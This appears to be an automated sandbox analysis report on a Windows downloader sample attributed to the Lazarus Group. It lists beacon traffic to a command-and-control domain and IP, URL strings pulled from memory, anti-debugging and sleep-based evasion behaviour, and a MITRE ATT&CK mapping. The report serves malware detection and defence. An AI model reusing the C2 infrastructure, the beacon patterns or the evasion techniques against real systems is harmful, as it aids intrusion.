Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: poem.ekosa.org
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 11 Jan 2021 16:54:56 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: WVbU1Gf5p8.exe, WVbU1Gf5p8.exe, 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp
Source: WVbU1Gf5p8.exe, 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp.bat
Source: WVbU1Gf5p8.exe, 00000000.00000003.915864738.000000000168F000.00000004.00000001.sdmp, WVbU1Gf5p8.exe, 00000000.00000002.1002662893.000000000168F000.00000004.00000020.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn6780;
Source: WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn6786
Source: WVbU1Gf5p8.exe, 00000000.00000002.1002662893.000000000168F000.00000004.00000020.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678:
Source: WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678B
Source: WVbU1Gf5p8.exe, 00000000.00000002.1002522478.000000000139A000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678C:
Source: WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678F
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678H;c
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678T;O
Source: WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678V
Source: WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678Z;q
Source: WVbU1Gf5p8.exe, 00000000.00000002.1002662893.000000000168F000.00000004.00000020.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678j
Source: WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678k
Source: WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678l;
Source: WVbU1Gf5p8.exe, 00000000.00000003.915864738.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678n
Source: WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678r
Source: WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678~
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678~;
Source: WVbU1Gf5p8.exe, 00000000.00000003.915864738.000000000168F000.00000004.00000001.sdmp, WVbU1Gf5p8.exe, 00000000.00000002.1002662893.000000000168F000.00000004.00000020.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6u
Source: WVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6u.
Source: WVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uD
Source: WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uE
Source: WVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uJ
Source: WVbU1Gf5p8.exe, 00000000.00000003.781276052.00000000016C6000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uL
Source: WVbU1Gf5p8.exe, 00000000.00000003.923239328.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uO
Source: WVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uP
Source: WVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uX
Source: WVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6ud
Source: WVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uer
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn6786
Source: WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678H;c
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678k
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678l;
Source: WVbU1Gf5p8.exe, 00000000.00000003.923239328.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678~;
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6ul
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6um
Source: WVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uon
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uq
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6ur
Source: WVbU1Gf5p8.exe, 00000000.00000003.915864738.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6urm
Source: WVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uv
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
Source: WVbU1Gf5p8.exe, 00000000.00000002.1002648212.000000000166A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

barindex
Submitted sample is a known malware sampleShow sources
Source: WVbU1Gf5p8.exeInitial file: MD5: 69f7cde70cc22aceb5dd32ff1dc3f685 Family: Lazarus Group Alias: Operation DarkSeoul, Dark Seoul, Hidden Cobra, Hastati Group, Andariel Group, Unit 121, Bureau 121, NewRomanic Cyber Army Team, Bluenoroff, Group 77, Labyrinth Chollima, Operation Troy, Operation GhostSecret, Guardians of Peace, ZINC, NICKEL ACADEMY, APT-C-26, Silent Chollima, Lazarus Group Description: Lazarus Group, active since at least 2009, is an APT group that has been attributed to the North Korean. There are lots of campaigns connected, including Operation Blockbuster, Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, Ten Days of Rain, etc.In November 2014, it carried out destructive wiping attack against Sony Pictures Entertainment. In 2016, it attacked Bangladesh central banks and stole US$81 million. In the middle of 2017, the WannaCry malware which leverages the leaked EternalBlue exploits affected as many as 300,000 computers worldwide. References: Data Source: https://github.com/RedDrip7/APT_Digital_Weapon
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_012317800_2_01231780
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01231EB00_2_01231EB0
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_0123B40E0_2_0123B40E
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_0123AF600_2_0123AF60
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_0123FA1C0_2_0123FA1C
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_012346F70_2_012346F7
Source: WVbU1Gf5p8.exe, 00000000.00000002.1002630413.0000000001640000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs WVbU1Gf5p8.exe
Source: WVbU1Gf5p8.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: classification engineClassification label: mal60.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeFile created: C:\Users\user\AppData\Local\Temp\TMP9518.tmpJump to behavior
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCommand line argument: TMP0_2_01232240
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCommand line argument: TMP0_2_01232240
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCommand line argument: .bat0_2_01232240
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCommand line argument: CPE:%08x0_2_01232240
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCommand line argument: DFE:%08x0_2_01232240
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: WVbU1Gf5p8.exeVirustotal: Detection: 71%
Source: WVbU1Gf5p8.exeReversingLabs: Detection: 66%
Source: WVbU1Gf5p8.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01231EB0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_01231EB0
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_012445B5 push esi; ret 0_2_012445BE
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01232E86 push ecx; ret 0_2_01232E99
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeThread delayed: delay time: 180000Jump to behavior
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exe TID: 3296Thread sleep count: 78 > 30Jump to behavior
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exe TID: 3296Thread sleep time: -14040000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_012385AB FindFirstFileExA,0_2_012385AB
Source: WVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01232C32 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_01232C32
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01231EB0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_01231EB0
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01235C5E mov eax, dword ptr fs:[00000030h]0_2_01235C5E
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_0123A191 GetProcessHeap,0_2_0123A191
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01232D83 SetUnhandledExceptionFilter,0_2_01232D83
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01232C32 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_01232C32
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01236B11 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_01236B11
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01232796 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_01232796
Source: WVbU1Gf5p8.exe, 00000000.00000002.1002760838.0000000001EC0000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: WVbU1Gf5p8.exe, 00000000.00000002.1002760838.0000000001EC0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: WVbU1Gf5p8.exe, 00000000.00000002.1002760838.0000000001EC0000.00000002.00000001.sdmpBinary or memory string: Progman
Source: WVbU1Gf5p8.exe, 00000000.00000002.1002760838.0000000001EC0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01232E9B cpuid 0_2_01232E9B
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01232B24 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_01232B24

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter2Path InterceptionProcess Injection1Virtualization/Sandbox Evasion2Input Capture1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection1LSASS MemorySecurity Software Discovery21Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information11Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery12Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
WVbU1Gf5p8.exe71%VirustotalBrowse
WVbU1Gf5p8.exe67%ReversingLabsWin32.Downloader.SilverRage
WVbU1Gf5p8.exe100%AviraTR/Dldr.Agent.wtwyi
WVbU1Gf5p8.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
0.2.WVbU1Gf5p8.exe.1230000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
0.0.WVbU1Gf5p8.exe.1230000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

SourceDetectionScannerLabelLink
poem.ekosa.org0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://poem.ekosa.org/intro/info/info.asp?id=dn678C:0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678~0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uon0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn67860%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uX0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678B0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn6780%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp.bat0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678l;0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uL0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn67860%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678l;0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uO0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn6780;0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uP0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678:0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678Z;q0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn6780%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uer0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6ud0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678n0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678r0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678H;c0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678k0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678k0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678j0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678~;0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678T;O0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uv0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678~;0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678H;c0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678V0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6um0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6u.0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uq0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6urm0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6ur0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uE0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uJ0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678F0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6u0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
poem.ekosa.org
210.116.91.80
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://poem.ekosa.org/intro/info/info.asp?id=dn678false
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6ufalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://poem.ekosa.org/intro/info/info.asp?id=dn678C:WVbU1Gf5p8.exe, 00000000.00000002.1002522478.000000000139A000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn678~WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uonWVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
